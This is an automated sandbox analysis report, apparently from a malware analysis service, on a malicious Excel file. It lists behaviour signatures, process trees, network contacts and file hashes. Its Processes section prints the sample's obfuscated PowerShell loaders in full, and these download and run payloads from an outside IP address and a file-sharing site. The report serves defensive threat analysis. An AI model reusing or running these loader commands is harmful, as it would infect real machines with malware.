Malware Analysis Report

2024-12-07 16:49

Sample ID 241113-dkbsmswarr
Target ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls
SHA256 ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed
Tags
defense_evasion discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed

Threat Level: Known bad

The file ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Blocklisted process makes network request

Evasion via Device Credential Deployment

Command and Scripting Interpreter: PowerShell

Drops file in System32 directory

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Uses Volume Shadow Copy WMI provider

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 03:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 03:03

Reported

2024-11-13 03:06

Platform

win7-20241023-en

Max time kernel

139s

Max time network

140s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2860 wrote to memory of 2692 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE
PID 2860 wrote to memory of 2692 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE
PID 2860 wrote to memory of 2692 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE
PID 2860 wrote to memory of 2692 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE
PID 2692 wrote to memory of 1660 N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 1660 N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 1660 N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 1660 N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2692 wrote to memory of 1784 N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2692 wrote to memory of 1784 N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2692 wrote to memory of 1784 N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2692 wrote to memory of 1784 N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1784 wrote to memory of 308 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1784 wrote to memory of 308 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1784 wrote to memory of 308 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1784 wrote to memory of 308 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2692 wrote to memory of 2748 N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\SysWOW64\WScript.exe
PID 2692 wrote to memory of 2748 N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\SysWOW64\WScript.exe
PID 2692 wrote to memory of 2748 N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\SysWOW64\WScript.exe
PID 2692 wrote to memory of 2748 N/A C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE C:\Windows\SysWOW64\WScript.exe
PID 2748 wrote to memory of 3064 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2748 wrote to memory of 3064 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2748 wrote to memory of 3064 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2748 wrote to memory of 3064 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 2228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 2228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 2228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 2228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE

"C:\Windows\SYSteM32\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE" "poWERSheLL.ExE -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT ; IeX($(IeX('[SYsTEM.TEXT.EncodiNG]'+[CHar]58+[CHAR]0x3a+'UTF8.GetStRing([sYSTEm.coNverT]'+[chaR]0x3A+[chaR]58+'froMbase64String('+[cHAR]0x22+'JGtrUUk4aCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRUZpbklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFVWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6bSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0dqbVhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWVZsc3VVTixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3FCamhCSkdxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJaIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdmV0NjeUhvR0wgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAka2tRSThoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3OC4xOTIvMzUvc2VldGhlYmVzdGdpcmxzZXZlcmRpZGJlc3R0aGlnbnN3aXRobXlzZWxmLnRJRiIsIiRFTnY6QVBQREFUQVxzZWV0aGViZXN0Z2lybHNldmVyZGlkYmVzdHRoaWducy52YnMiLDAsMCk7c1RBclQtU2xlRXAoMyk7c3RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVxzZWV0aGViZXN0Z2lybHNldmVyZGlkYmVzdHRoaWducy52YnMi'+[cHar]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\clbffc8o.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD682.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD681.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQc2hPTWVbNF0rJHBzSG9tRVszMF0rJ3gnKSggKCgnQU04aW1hZ2VVcmwgPSB5OWNuaHR0cHM6Ly8xMDE3LmZpbGVtJysnYWlsLmNvbS9hJysncGkvZicrJ2lsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDdCVTEnKydrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY18nKydUMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiB5OWNuO0FNOHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7QU04aW1hZ2VCeXRlcyA9IEFNJysnOHdlYkNsaWVudC5Eb3dubG9hZERhdGEoQU04aW1hZ2UnKydVcmwpO0FNOGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKEFNJysnOGltYWdlQnl0ZScrJ3MpO0FNOHN0YXJ0RmxhZyA9IHk5Y248PCcrJ0JBU0U2NF9TVEFSVD4+eTljbjtBTThlbmRGbGFnJysnID0geTljbjw8QkEnKydTRTY0JysnX0VORD4+eTljbjtBTThzdGFydEluZGV4ID0gQScrJ004aW1hZ2VUZXh0LicrJ0luJysnZGV4T2YoQU04c3RhcnRGbGFnJysnKTtBJysnTThlbmRJbmRleCA9IEFNOGltYWdlVGV4dC5JbmRleE9mKEFNOGVuZEZsYWcpO0FNOHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBBTThlbmRJbmRleCAtZ3QgQU04c3RhcnRJbicrJ2QnKydleDtBTThzdGFydEluZGV4ICs9IEFNOHN0YXJ0RmxhZy5MZScrJ25ndCcrJ2g7QU04YmFzZTY0TGVuZ3RoID0gQU04ZW5kSW5kZXggLSBBTThzdGFydEluZGV4JysnO0FNOGJhc2U2NENvbW1hbmQgPSBBTThpbWFnZVRleHQuU3ViJysnc3RyaScrJ25nKEFNOHN0YXJ0SW5kZXgsIEFNOGJhc2U2NExlbmd0aCk7JysnQU04JysnYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoQU04YmFzZTY0Q29tbWFuZC4nKydUb0NoYXJBcnJheSgpIFBNVzYgRm9yRWFjaC1PYmplY3QgeyBBTThfIH0pWy0xLi4tKEFNOGJhc2UnKyc2NENvbW1hbmQuTGVuZ3RoKV07JysnQU0nKyc4Y29tbWFuJysnZEJ5dGVzID0gW1MnKyd5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhBTThiYXNlNjRSZXZlcnNlZCk7QU04bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEFNOGNvbW1hbmRCeXRlcyk7QU04dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh5OWNuVkFJeTljbik7QU04dmFpTWV0aG9kLkknKydudm9rZShBTThudWxsLCBAKHk5Y250eHQuRVJGVkdSRkUvNTMvMjkxLjg3MS42NC44OTEvLzpwdHRoeTljbiwgeTljbmRlc2F0JysnaXZhZG95OWNuLCB5OWNuZGVzYXRpdmFkb3k5Y24nKycsIHk5Y25kZXNhdGl2YWRveTljbiwgeTljbkNhc1BvbHk5YycrJ24sIHk5Y25kZXNhdGl2YWRveScrJzljbiwgeTljbmRlc2F0aXZhZG95OWNuLHk5Y25kZXNhdGl2YWRveTljJysnbix5OWNuZGVzYXRpdmFkb3k5Y24seTljbmRlc2F0aXZhZG95OWNuLHk5JysnY25kZXNhdGl2YWRveTljbix5OWNuZGVzYXQnKydpdmFkb3k5Y24seTljbjF5OWNuLHk5Y25kZXNhdGl2YWRveTljbikpOycpICAtY1JlcGxBY2UnUE1XNicsW0NoQVJdMTI0ICAtY1JlcGxBY2UoW0NoQVJdMTIxK1tDaEFSXTU3K1tDaEFSXTk5K1tDaEFSXTExMCksW0NoQVJdMzktcmVQTEFjZShbQ2hBUl02NStbQ2hBUl03NytbQ2hBUl01NiksW0NoQVJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PshOMe[4]+$psHomE[30]+'x')( (('AM8imageUrl = y9cnhttps://1017.filem'+'ail.com/a'+'pi/f'+'ile/get?filekey=2Aa_bWo9Reu45t7BU1'+'kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_'+'T35w&pk_vid=fd4f614bb209c62c1730945176a0904f y9cn;AM8webClient = New-Object System.Net.WebClient;AM8imageBytes = AM'+'8webClient.DownloadData(AM8image'+'Url);AM8imageText = [System.Text.Encoding]::UTF8.GetString(AM'+'8imageByte'+'s);AM8startFlag = y9cn<<'+'BASE64_START>>y9cn;AM8endFlag'+' = y9cn<<BA'+'SE64'+'_END>>y9cn;AM8startIndex = A'+'M8imageText.'+'In'+'dexOf(AM8startFlag'+');A'+'M8endIndex = AM8imageText.IndexOf(AM8endFlag);AM8startIndex -ge 0 -and AM8endIndex -gt AM8startIn'+'d'+'ex;AM8startIndex += AM8startFlag.Le'+'ngt'+'h;AM8base64Length = AM8endIndex - AM8startIndex'+';AM8base64Command = AM8imageText.Sub'+'stri'+'ng(AM8startIndex, AM8base64Length);'+'AM8'+'base64Reversed = -join (AM8base64Command.'+'ToCharArray() PMW6 ForEach-Object { AM8_ })[-1..-(AM8base'+'64Command.Length)];'+'AM'+'8comman'+'dBytes = [S'+'ystem.Convert]::FromBase64String(AM8base64Reversed);AM8loadedAssembly = [System.Reflection.Assembly]::Load(AM8commandBytes);AM8vaiMethod = [dnlib.IO.Home].GetMethod(y9cnVAIy9cn);AM8vaiMethod.I'+'nvoke(AM8null, @(y9cntxt.ERFVGRFE/53/291.871.64.891//:ptthy9cn, y9cndesat'+'ivadoy9cn, y9cndesativadoy9cn'+', y9cndesativadoy9cn, y9cnCasPoly9c'+'n, y9cndesativadoy'+'9cn, y9cndesativadoy9cn,y9cndesativadoy9c'+'n,y9cndesativadoy9cn,y9cndesativadoy9cn,y9'+'cndesativadoy9cn,y9cndesat'+'ivadoy9cn,y9cn1y9cn,y9cndesativadoy9cn));') -cReplAce'PMW6',[ChAR]124 -cReplAce([ChAR]121+[ChAR]57+[ChAR]99+[ChAR]110),[ChAR]39-rePLAce([ChAR]65+[ChAR]77+[ChAR]56),[ChAR]36) )"

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.82:80 r10.o.lencr.org tcp
US 198.46.178.192:80 198.46.178.192 tcp
KR 221.146.204.133:443 4t.gg tcp
US 198.46.178.192:80 198.46.178.192 tcp
US 198.46.178.192:80 198.46.178.192 tcp
US 8.8.8.8:53 1017.filemail.com udp
US 142.215.209.78:443 1017.filemail.com tcp
US 142.215.209.78:443 1017.filemail.com tcp

Files

memory/2140-1-0x00000000720AD000-0x00000000720B8000-memory.dmp

memory/2140-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2860-16-0x0000000001180000-0x0000000001182000-memory.dmp

memory/2140-17-0x0000000002310000-0x0000000002312000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 fca2d4075e78fd8330d5590ee560451b
SHA1 b7ab976b0f45facd4a29a6aded52515523cd756b
SHA256 9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689
SHA512 f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 babe37ac9f6d83aff9127cedd96b4e1e
SHA1 0bc44da57a054e8b6ca393ce1e254924a0d24e04
SHA256 ba3a09f7cb2a728311696fd5eaeefd373104ff23ba6aa676b9bc6766597a30dd
SHA512 6b809dac08601466670f78b01f667e6e9223aa2d388f23098bc37462adb28f62cfc1b30c9a3664f5433960b52e8318e955e5a76f073d6593bbbccdc5383d3da9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 a87ce9c3e4bd82acb666debd5af25f43
SHA1 85a43e29dd776014698c8203f789100a9c2f94db
SHA256 005c38f5c5e7df9efbbc89584de9a33a7e858695bc915e9ed5bcf3d75700fdf1
SHA512 f0f91c9bdfba2237e4777a5659187736f1a9b405045f9116874f6e38b366e2efc7ab48aabd12315c2cbb76a6dfa6e37266a25c85d50fc3b7a60dbd320a2e7d90

C:\Users\Admin\AppData\Local\Temp\CabCB6A.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9GP4P3HF\seethebestthingswithgoodthingswithgreatthignsfor[1].hta

MD5 c9d3eb12917bbe42af6b4f091caf5796
SHA1 a88fc365c18e643a27984d6a7436c91c49a21717
SHA256 7bd8a55560444bfe912702828550bcb7efcfb86a70a13c5d2c2e1035ae32e9d3
SHA512 fbcceaea137312e23f0480265b1e8e10c7f68f73346b08595a2e8b6b7d56f6fd764d1f6948da57f0e129019e71d0e2039924e4df0bc757fb7554ea1346aa96f5

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CSM0DA6Y469005TMZVVM.temp

MD5 68bd31e6547cdf0f6b6726cbea800f56
SHA1 977363cd19dfc030c2c2ec540d0346922e46e841
SHA256 0b58f5155c3ca16b7648d0fbfe4d654985a691b5fe943129fe00c4778d9de130
SHA512 57d7a3ed58235ba2de6140f063687b39f3c94b913748b2ff8ebc5ad8108593c63cfe5bd23df959bb3c58031e3d0112da5d7d55a811847389a72381cb6570dad3

\??\c:\Users\Admin\AppData\Local\Temp\clbffc8o.cmdline

MD5 cee59847281c003ac966e2b8387a18b2
SHA1 1f7333e7e311f4b5c719bbbad6b1734187d51a0c
SHA256 0836e6c4c1c6a23f3d77c513130d139af1c345d08cf1288623377f0ef6123407
SHA512 92b9e0aa499f58ba092e980f2f528fa499e3f639598da3f7163344c4f119b8901558840c0762d643aeb648d33a74f954e0f9991af381d1b076a4c833300b5929

\??\c:\Users\Admin\AppData\Local\Temp\clbffc8o.0.cs

MD5 39d4a6691d37c11ed58d537b74f12aad
SHA1 caa119f2a0ad6f53ddb8a2447b379ac5ed11c1d6
SHA256 0ad0cda12412bd6fa525c0e4f876fb02a55a98e7555e5a43423c577465611df1
SHA512 f4d2f58e0c3a15aec4dd83b4268e9a4c1f3b5ef3c735204457e2115b9835af874f4d34b7311a182e7b395888b523e9f46bb8b6ca08db60ad9eda04b89013813c

C:\Users\Admin\AppData\Local\Temp\clbffc8o.pdb

MD5 3040b1e499cca7b496da428300cb1788
SHA1 8237f76c132ece236aee66ea7ae4a3b16e164334
SHA256 38ea0d12e93c4cc8c91c6de3b903854c96993964d9b75a2096a785fa1e44d32a
SHA512 b61590c8ad29447e6d4585088d05e09518a726d002fabe291fe1f5ae13e7223406358814dc700aa65a639e8f4353bf11a89107256008b28c8dc739135a16c9ee

C:\Users\Admin\AppData\Local\Temp\clbffc8o.dll

MD5 e51a3a163b0ea2a5c3365e8cd5857226
SHA1 1e4f27d69a9764558ef73f31f1f34edb2c6a18db
SHA256 a4b61fe3bb65cb54586ba22870fcbe371bb1abd696d3d58ccc4e2545013ad959
SHA512 8380363d1793ccc2cf2a7e52653b40526f03cd60914159c1f101155c0ba6b2e63364ca0931314b9699f845bff2d535d2f78ecb974ddcd38792b754aceec2242a

C:\Users\Admin\AppData\Local\Temp\RESD682.tmp

MD5 a168413d00e1173092bf4047235bb7e5
SHA1 18a413a31b668f736bbb906a8228b78824d00e6b
SHA256 aa12d23a40d81a523de14ed101e7cfd2349b9ad3339d3d96d5d4ddbee1a187f1
SHA512 1034d0c77bd55b14b3546696db06ee055e98fd770d1e9d69191c7c6e5e2733ff588c60988a1aa63e0f5026419d40cd355194b11d34487e4982f54ffa8bb613a9

\??\c:\Users\Admin\AppData\Local\Temp\CSCD681.tmp

MD5 bbc3f888ff3d1900f18f75ad99282ee2
SHA1 7a21c55f7bfa9dba6fd0ac83fcebd487df3c8566
SHA256 5a9ec907bc757f9dd645b36b5a1903b07db9aa7a69ec99805f63ce046651796d
SHA512 254451ef624033d835281e490e87b83dc2fbe1e580a6e8c2bed782d296e6c4eb20c1080cf07a1d6d2fdfce43b98299d7243ba89ec30c28430dda0c66db69c950

memory/2140-60-0x00000000720AD000-0x00000000720B8000-memory.dmp

C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs

MD5 8e033f9bcfdc081ed84adcbf69b2cfed
SHA1 29919300cdba9322ec872189cea15ff7d573fc42
SHA256 4d489671247459e4b2c1403511606a2463199f1a5044d7e1841e5387b8c86e0a
SHA512 58fca96df828c75274613291f1048228076ef0516d4bcdd4e51cba3d9c9c566b6ce5f03387bfd60cb627bbd8a799b37593fd3624574afd50f6df6f9777754ac0

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
